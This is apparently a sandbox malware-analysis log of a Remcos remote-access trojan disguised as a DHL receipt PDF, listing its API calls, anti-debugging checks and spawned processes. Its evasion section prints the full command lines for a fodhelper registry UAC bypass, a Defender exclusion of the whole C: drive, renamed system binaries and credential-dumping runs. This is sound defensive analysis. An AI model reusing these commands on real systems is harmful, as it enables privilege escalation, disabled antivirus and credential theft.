              Source: C:\ProgramData\Remcos\remcos.exe Code function: 20_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,NtQuerySystemInformation,FindCloseChangeNotification,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,NtQueryObject,CloseHandle,_wcsicmp,CloseHandle, 20_2_0040DD85
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Code function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle, 0_2_2DA5A748
              Source: C:\ProgramData\Remcos\remcos.exe Code function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle, 5_2_2D5BA748
              Source: C:\Users\Public\xkn.exe Thread delayed: delay time: 922337203685477
              Source: C:\Users\Public\Libraries\yfkwifxL.pif Window / User API: threadDelayed 387
              Source: C:\ProgramData\Remcos\remcos.exe Window / User API: threadDelayed 3512
              Source: C:\ProgramData\Remcos\remcos.exe Window / User API: threadDelayed 6349
              Source: C:\ProgramData\Remcos\remcos.exe Window / User API: foregroundWindowGot 1739
              Source: C:\Users\Public\xkn.exe Window / User API: threadDelayed 1934
              Source: C:\Users\Public\alpha.exe API coverage: 6.5 %
              Source: C:\Users\Public\alpha.exe API coverage: 8.1 %
              Source: C:\Users\Public\Libraries\yfkwifxL.pif TID: 7480 Thread sleep count: 387 > 30
              Source: C:\ProgramData\Remcos\remcos.exe TID: 8008 Thread sleep time: -1756000s >= -30000s
              Source: C:\ProgramData\Remcos\remcos.exe TID: 8008 Thread sleep time: -3174500s >= -30000s
              Source: C:\Users\Public\xkn.exe TID: 7952 Thread sleep count: 1934 > 30
              Source: C:\Users\Public\xkn.exe TID: 7956 Thread sleep count: 149 > 30
              Source: C:\Users\Public\xkn.exe TID: 8056 Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Code function: 0_2_028A58B4 GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA, 0_2_028A58B4
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Code function: 0_2_2DA4BD37 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose, 0_2_2DA4BD37
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Code function: 0_2_2DA4783C FindFirstFileW,FindNextFileW, 0_2_2DA4783C
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Code function: 0_2_2DA4880C __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose, 0_2_2DA4880C
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Code function: 0_2_2DA4BB30 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose, 0_2_2DA4BB30
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Code function: 0_2_2DA59AF5 FindFirstFileW,FindNextFileW,FindNextFileW, 0_2_2DA59AF5
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Code function: 0_2_2DA49665 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose, 0_2_2DA49665
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Code function: 0_2_2DA4C34D FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose, 0_2_2DA4C34D
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Code function: 0_2_2DA5C291 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose, 0_2_2DA5C291
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Code function: 0_2_2DA49253 __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose, 0_2_2DA49253
              Source: C:\ProgramData\Remcos\remcos.exe Code function: 5_2_45BC10F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose, 5_2_45BC10F1
              Source: C:\ProgramData\Remcos\remcos.exe Code function: 5_2_2D5AC34D FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose, 5_2_2D5AC34D
              Source: C:\ProgramData\Remcos\remcos.exe Code function: 5_2_2D5ABD37 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose, 5_2_2D5ABD37
              Source: C:\ProgramData\Remcos\remcos.exe Code function: 5_2_2D5A9665 FindFirstFileW,FindNextFileW,FindClose,FindClose, 5_2_2D5A9665
              Source: C:\ProgramData\Remcos\remcos.exe Code function: 5_2_2D5A880C FindFirstFileW,FindNextFileW,FindClose, 5_2_2D5A880C
              Source: C:\ProgramData\Remcos\remcos.exe Code function: 5_2_2D5A783C FindFirstFileW,FindNextFileW, 5_2_2D5A783C
              Source: C:\ProgramData\Remcos\remcos.exe Code function: 5_2_2D5ABB30 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose, 5_2_2D5ABB30
              Source: C:\ProgramData\Remcos\remcos.exe Code function: 5_2_2D5B9AF5 FindFirstFileW, 5_2_2D5B9AF5
              Source: C:\ProgramData\Remcos\remcos.exe Code function: 5_2_2D5BC291 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose, 5_2_2D5BC291
              Source: C:\Users\Public\alpha.exe Code function: 7_2_00007FF7689C2978 FindFirstFileW,FindClose,memmove,_wcsnicmp,_wcsicmp,memmove, 7_2_00007FF7689C2978
              Source: C:\Users\Public\alpha.exe Code function: 7_2_00007FF7689B35B8 GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPEAX@Z,FindNextFileW,SetLastError,??_V@YAXPEAX@Z,GetLastError,FindClose, 7_2_00007FF7689B35B8
              Source: C:\Users\Public\alpha.exe Code function: 7_2_00007FF7689B1560 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPEAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW, 7_2_00007FF7689B1560
              Source: C:\Users\Public\alpha.exe Code function: 7_2_00007FF7689C823C FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,FindNextFileW,GetProcessHeap,HeapReAlloc,FindClose,GetLastError,FindClose, 7_2_00007FF7689C823C
              Source: C:\Users\Public\alpha.exe Code function: 7_2_00007FF7689D7B4C FindFirstFileW,FindNextFileW,FindClose, 7_2_00007FF7689D7B4C
              Source: C:\Users\Public\alpha.exe Code function: 8_2_00007FF7689C2978 FindFirstFileW,FindClose,memmove,_wcsnicmp,_wcsicmp,memmove, 8_2_00007FF7689C2978
              Source: C:\Users\Public\alpha.exe Code function: 8_2_00007FF7689B35B8 GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPEAX@Z,FindNextFileW,SetLastError,??_V@YAXPEAX@Z,GetLastError,FindClose, 8_2_00007FF7689B35B8
              Source: C:\Users\Public\alpha.exe Code function: 8_2_00007FF7689B1560 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPEAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW, 8_2_00007FF7689B1560
              Source: C:\Users\Public\alpha.exe Code function: 8_2_00007FF7689C823C FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,FindNextFileW,GetProcessHeap,HeapReAlloc,FindClose,GetLastError,FindClose, 8_2_00007FF7689C823C
              Source: C:\Users\Public\alpha.exe Code function: 8_2_00007FF7689D7B4C FindFirstFileW,FindNextFileW,FindClose, 8_2_00007FF7689D7B4C
              Source: C:\Users\Public\alpha.exe Code function: 11_2_00007FF7689C2978 FindFirstFileW,FindClose,memmove,_wcsnicmp,_wcsicmp,memmove, 11_2_00007FF7689C2978
              Source: C:\Users\Public\alpha.exe Code function: 11_2_00007FF7689C823C FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,FindNextFileW,GetProcessHeap,HeapReAlloc,FindClose,GetLastError,FindClose, 11_2_00007FF7689C823C
              Source: C:\Users\Public\alpha.exe Code function: 11_2_00007FF7689B35B8 GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPEAX@Z,FindNextFileW,SetLastError,??_V@YAXPEAX@Z,GetLastError,FindClose, 11_2_00007FF7689B35B8
              Source: C:\Users\Public\alpha.exe Code function: 11_2_00007FF7689B1560 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPEAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW, 11_2_00007FF7689B1560
              Source: C:\Users\Public\alpha.exe Code function: 11_2_00007FF7689D7B4C FindFirstFileW,FindNextFileW,FindClose, 11_2_00007FF7689D7B4C
              Source: C:\ProgramData\Remcos\remcos.exe Code function: 20_2_0040AE51 FindFirstFileW,FindNextFileW, 20_2_0040AE51
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Code function: 0_2_2DA47C97 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW, 0_2_2DA47C97
              Source: C:\ProgramData\Remcos\remcos.exe Code function: 20_2_00418981 memset,GetSystemInfo, 20_2_00418981
              Source: C:\Users\Public\Libraries\yfkwifxL.pif File opened: C:\Users\user\AppData\Local\Temp\971D.tmp
              Source: C:\Users\Public\Libraries\yfkwifxL.pif File opened: C:\Users\user\AppData\Local\Temp\971D.tmp\971E.tmp\971F.tmp
              Source: C:\Users\Public\Libraries\yfkwifxL.pif File opened: C:\Users\user\AppData\Local\Temp\971D.tmp\971E.tmp
              Source: C:\Users\Public\Libraries\yfkwifxL.pif File opened: C:\Users\user\AppData\Local\
              Source: C:\Users\Public\Libraries\yfkwifxL.pif File opened: C:\Users\user\AppData\
              Source: C:\Users\Public\Libraries\yfkwifxL.pif File opened: C:\Users\user\
              Source: DHL119040 receipt document,pdf.exe, 00000000.00000002.1767013718.000000002D4A0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}/
              Source: remcos.exe, 00000005.00000003.2495195911.00000000005F0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWh[b%SystemRoot%\system32\mswsock.dllss~W
              Source: DHL119040 receipt document,pdf.exe, 00000000.00000002.1722944683.000000000073E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW8|z%SystemRoot%\system32\mswsock.dll
              Source: DHL119040 receipt document,pdf.exe, 00000000.00000002.1722944683.00000000007A0000.00000004.00000020.00020000.00000000.sdmp, remcos.exe, 00000005.00000003.2495195911.000000000061E000.00000004.00000020.00020000.00000000.sdmp, remcos.exe, 00000029.00000002.1940219819.000000000075D000.00000004.00000020.00020000.00000000.sdmp, remcos.exe, 0000002C.00000002.2020797857.00000000007AA000.00000004.00000020.00020000.00000000.sdmp, remcos.exe, 0000002C.00000002.2020797857.00000000007DE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
              Source: DHL119040 receipt document,pdf.exe, 00000000.00000002.1767013718.000000002D4A0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\e
              Source: bhvC179.tmp.20.dr Binary or memory string: https://r.bing.com/rb/18/jnc,nj/6hU_LneafI_NFLeDvM367ebFaKQ.js?bu=Dx0ma3d6fXRucbIBtQEmpQEmuAE&or=w
              Source: remcos.exe, 00000005.00000003.2495195911.000000000061E000.00000004.00000020.00020000.00000000.sdmp, remcos.exe, 00000005.00000002.4124047800.0000000000625000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWzf
              Source: remcos.exe, 00000029.00000002.1940219819.0000000000718000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
              Source: bhvC179.tmp.20.dr Binary or memory string: https://config.edge.skype.com/config/v1/Skype/1446_8.53.0.77?OSVer=10.0.19045.2006&ClientID=RHTiQUpXOaQeBtbq%2B7LgJauNdx5lF%2FQ%2FOy2qwXRNGjU%3D&Manufacturer=VMware%2C%20Inc.&Model=VMware20%2C1&Language=en&Locale=en-US
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe API call chain: ExitProcess graph end node graph_0-84393
              Source: C:\ProgramData\Remcos\remcos.exe API call chain: ExitProcess graph end node
              Source: C:\Users\Public\xkn.exe Process information queried: ProcessInformation

              Anti Debugging

              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Code function: 0_2_028BD920 GetModuleHandleW,GetProcAddress,CheckRemoteDebuggerPresent, 0_2_028BD920
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Process queried: DebugPort
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Process queried: DebugFlags
              Source: C:\ProgramData\Remcos\remcos.exe Process queried: DebugPort
              Source: C:\ProgramData\Remcos\remcos.exeProcess queried: DebugFlagsJump to behavior
              Source: C:\ProgramData\Remcos\remcos.exeProcess queried: DebugPort
              Source: C:\ProgramData\Remcos\remcos.exeProcess queried: DebugPort
              Source: C:\ProgramData\Remcos\remcos.exeProcess queried: DebugFlags
              Source: C:\ProgramData\Remcos\remcos.exeProcess queried: DebugPort
              Source: C:\ProgramData\Remcos\remcos.exeProcess queried: DebugPort
              Source: C:\ProgramData\Remcos\remcos.exeProcess queried: DebugFlags
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeCode function: 0_2_2DA749F9 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_2DA749F9
              Source: C:\Users\Public\ger.exeCode function: 19_2_00007FF6DF31A29C memset,SearchPathW,CreateFileW,GetFileSize,ReadFile,SetFilePointer,CharNextW,IsCharAlphaNumericW,StrToIntW,IsCharAlphaNumericW,StrToIntW,CharNextW,GetLastError,OutputDebugStringW,CloseHandle,19_2_00007FF6DF31A29C
              Source: C:\ProgramData\Remcos\remcos.exeCode function: 20_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,NtQuerySystemInformation,FindCloseChangeNotification,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,NtQueryObject,CloseHandle,_wcsicmp,CloseHandle,20_2_0040DD85
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeCode function: 0_2_028B7CC8 LoadLibraryW,GetProcAddress,NtWriteVirtualMemory,FreeLibrary,0_2_028B7CC8
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeCode function: 0_2_2DA832B5 mov eax, dword ptr fs:[00000030h]0_2_2DA832B5
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeCode function: 0_2_028FF3AD mov eax, dword ptr fs:[00000030h]0_2_028FF3AD
              Source: C:\ProgramData\Remcos\remcos.exeCode function: 5_2_45BC4AB4 mov eax, dword ptr fs:[00000030h]5_2_45BC4AB4
              Source: C:\ProgramData\Remcos\remcos.exeCode function: 5_2_2D5E32B5 mov eax, dword ptr fs:[00000030h]5_2_2D5E32B5
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeCode function: 0_2_2DA51CFE SetLastError,GetNativeSystemInfo,SetLastError,GetProcessHeap,HeapAlloc,SetLastError,0_2_2DA51CFE
              Source: C:\Users\Public\xkn.exeProcess token adjusted: Debug
              Source: C:\ProgramData\Remcos\remcos.exeProcess token adjusted: Debug
              Source: C:\Windows\System32\taskkill.exeProcess token adjusted: Debug
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeCode function: 0_2_2DA74FDC SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_2DA74FDC
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeCode function: 0_2_2DA749F9 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_2DA749F9
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeCode function: 0_2_2DA7BB22 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_2DA7BB22
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeCode function: 0_2_2DA74B47 SetUnhandledExceptionFilter,0_2_2DA74B47
              Source: C:\Users\Public\Libraries\yfkwifxL.pifCode function: 1_2_004098D0 SetUnhandledExceptionFilter,SetUnhandledExceptionFilter,SetUnhandledExceptionFilter,1_2_004098D0
              Source: C:\Users\Public\Libraries\yfkwifxL.pifCode function: 1_2_004098F0 SetUnhandledExceptionFilter,1_2_004098F0
              Source: C:\ProgramData\Remcos\remcos.exeCode function: 5_2_45BC60E2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,5_2_45BC60E2
              Source: C:\ProgramData\Remcos\remcos.exeCode function: 5_2_45BC2B1C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,5_2_45BC2B1C
              Source: C:\ProgramData\Remcos\remcos.exeCode function: 5_2_45BC2639 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,5_2_45BC2639
              Source: C:\ProgramData\Remcos\remcos.exeCode function: 5_2_2D5D4FDC SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,5_2_2D5D4FDC
              Source: C:\ProgramData\Remcos\remcos.exeCode function: 5_2_2D5D49F9 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,5_2_2D5D49F9
              Source: C:\ProgramData\Remcos\remcos.exeCode function: 5_2_2D5D49F8 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,5_2_2D5D49F8
              Source: C:\ProgramData\Remcos\remcos.exeCode function: 5_2_2D5D4B47 SetUnhandledExceptionFilter,5_2_2D5D4B47
              Source: C:\ProgramData\Remcos\remcos.exeCode function: 5_2_2D5DBB22 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,5_2_2D5DBB22
              Source: C:\Users\Public\alpha.exeCode function: 7_2_00007FF7689C8FA4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,7_2_00007FF7689C8FA4
              Source: C:\Users\Public\alpha.exeCode function: 7_2_00007FF7689C93B0 SetUnhandledExceptionFilter,7_2_00007FF7689C93B0
              Source: C:\Users\Public\alpha.exeCode function: 8_2_00007FF7689C8FA4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,8_2_00007FF7689C8FA4
              Source: C:\Users\Public\alpha.exeCode function: 8_2_00007FF7689C93B0 SetUnhandledExceptionFilter,8_2_00007FF7689C93B0
              Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF7689C8FA4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,11_2_00007FF7689C8FA4
              Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF7689C93B0 SetUnhandledExceptionFilter,11_2_00007FF7689C93B0
              Source: C:\Users\Public\ger.exeCode function: 19_2_00007FF6DF31ED50 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,19_2_00007FF6DF31ED50
              Source: C:\Users\Public\ger.exeCode function: 19_2_00007FF6DF31F050 SetUnhandledExceptionFilter,19_2_00007FF6DF31F050
              Source: C:\Users\Public\xkn.exeMemory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion

Source: C:\Windows\System32\cmd.exe | Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c C:\\Users\\Public\\xkn -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\"' ; "
Source: C:\Users\Public\alpha.exe | Process created: C:\Users\Public\xkn.exe C:\\Users\\Public\\xkn -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\"' ; "
Source: C:\Users\Public\xkn.exe | Process created: C:\Users\Public\alpha.exe "C:\Users\Public\alpha.exe" /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "C:\\Users\\Public\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:""
Source: C:\Users\Public\alpha.exe | Process created: C:\Users\Public\ger.exe C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "C:\\Users\\Public\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:""
Source: C:\Windows\System32\cmd.exe | Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c C:\\Users\\Public\\xkn -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\"' ; "
Source: C:\Users\Public\alpha.exe | Process created: C:\Users\Public\xkn.exe C:\\Users\\Public\\xkn -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\"' ; "
Source: C:\Users\Public\xkn.exe | Process created: C:\Users\Public\alpha.exe "C:\Users\Public\alpha.exe" /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "C:\\Users\\Public\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:""
Source: C:\Users\Public\alpha.exe | Process created: C:\Users\Public\ger.exe C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "C:\\Users\\Public\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:""
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe | Memory allocated: C:\Users\Public\Libraries\yfkwifxL.pif base: 400000 protect: page execute and read and write
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe | Memory allocated: C:\Users\Public\Libraries\yfkwifxL.pif base: 24020000 protect: page execute and read and write
Source: C:\ProgramData\Remcos\remcos.exe | Code function: 5_2_2D5B80EF CreateProcessW,VirtualAlloc,Wow64GetThreadContext,ReadProcessMemory,NtCreateSection,NtUnmapViewOfSection,NtMapViewOfSection,VirtualFree,NtClose,TerminateProcess,GetCurrentProcess,NtMapViewOfSection,WriteProcessMemory,Wow64SetThreadContext,ResumeThread,VirtualFree,GetCurrentProcess,NtUnmapViewOfSection,NtClose,TerminateProcess,GetLastError
Source: C:\Windows\System32\extrac32.exe | File created: C:\Users\Public\alpha.exe
Source: C:\ProgramData\Remcos\remcos.exe | Section loaded: NULL target: C:\ProgramData\Remcos\remcos.exe protection: execute and read and write
Source: C:\ProgramData\Remcos\remcos.exe | Section loaded: NULL target: C:\ProgramData\Remcos\remcos.exe protection: execute and read and write
Source: C:\ProgramData\Remcos\remcos.exe | Section loaded: NULL target: C:\ProgramData\Remcos\remcos.exe protection: execute and read and write
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe | Section unmapped: C:\Users\Public\Libraries\yfkwifxL.pif base address: 400000
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe | Memory written: C:\Users\Public\Libraries\yfkwifxL.pif base: 256008
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe | Code function: 0_2_2DA520F7 GetCurrentProcessId,OpenMutexA,CloseHandle,CreateThread,CloseHandle,Sleep,OpenProcess, svchost.exe
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe | Code function: 0_2_2DA59627 mouse_event
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe | Process created: C:\Users\Public\Libraries\yfkwifxL.pif C:\Users\Public\Libraries\yfkwifxL.pif
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe | Process created: C:\ProgramData\Remcos\remcos.exe "C:\ProgramData\Remcos\remcos.exe"
Source: C:\Users\Public\Libraries\yfkwifxL.pif | Process created: C:\Windows\System32\cmd.exe "C:\Windows\sysnative\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\971D.tmp\971E.tmp\971F.bat C:\Users\Public\Libraries\yfkwifxL.pif"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\extrac32.exe C:\\Windows\\System32\\extrac32 /C /Y C:\\Windows\\System32\\cmd.exe "C:\\Users\\Public\\alpha.exe"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c mkdir "\\?\C:\Windows "
Source: C:\Windows\System32\cmd.exe | Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c mkdir "\\?\C:\Windows \System32"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\reg.exe "C:\\Users\\Public\\ger.exe"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe "C:\\Users\\Public\\xkn.exe"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\fodhelper.exe "C:\\Windows \\System32\\per.exe"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c C:\\Users\\Public\\xkn -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\"' ; "
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows \System32\per.exe "C:\\Windows \\System32\\per.exe"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c mkdir "\\?\C:\Windows \System32"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c ping 127.0.0.1 -n 2
Source: C:\Windows\System32\cmd.exe | Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c del /q "C:\Windows \System32\*"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c rmdir "C:\Windows \System32"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c rmdir "C:\Windows \"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c del /q "C:\\Windows \\System32\\per.exe" / A / F / Q / S
Source: C:\Windows\System32\cmd.exe | Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\ger.exe" / A / F / Q / S
Source: C:\Windows\System32\cmd.exe | Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\kn.exe" / A / F / Q / S
Source: C:\Windows\System32\cmd.exe | Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\xkn.exe" / A / F / Q / S
Source: C:\ProgramData\Remcos\remcos.exe | Process created: C:\ProgramData\Remcos\remcos.exe C:\ProgramData\Remcos\remcos.exe /stext "C:\Users\user\AppData\Local\Temp\huychgflg"
Source: C:\ProgramData\Remcos\remcos.exe | Process created: C:\ProgramData\Remcos\remcos.exe C:\ProgramData\Remcos\remcos.exe /stext "C:\Users\user\AppData\Local\Temp\jpluazqfutyle"
Source: C:\ProgramData\Remcos\remcos.exe | Process created: C:\ProgramData\Remcos\remcos.exe C:\ProgramData\Remcos\remcos.exe /stext "C:\Users\user\AppData\Local\Temp\tjrfarbgibqpoisd"
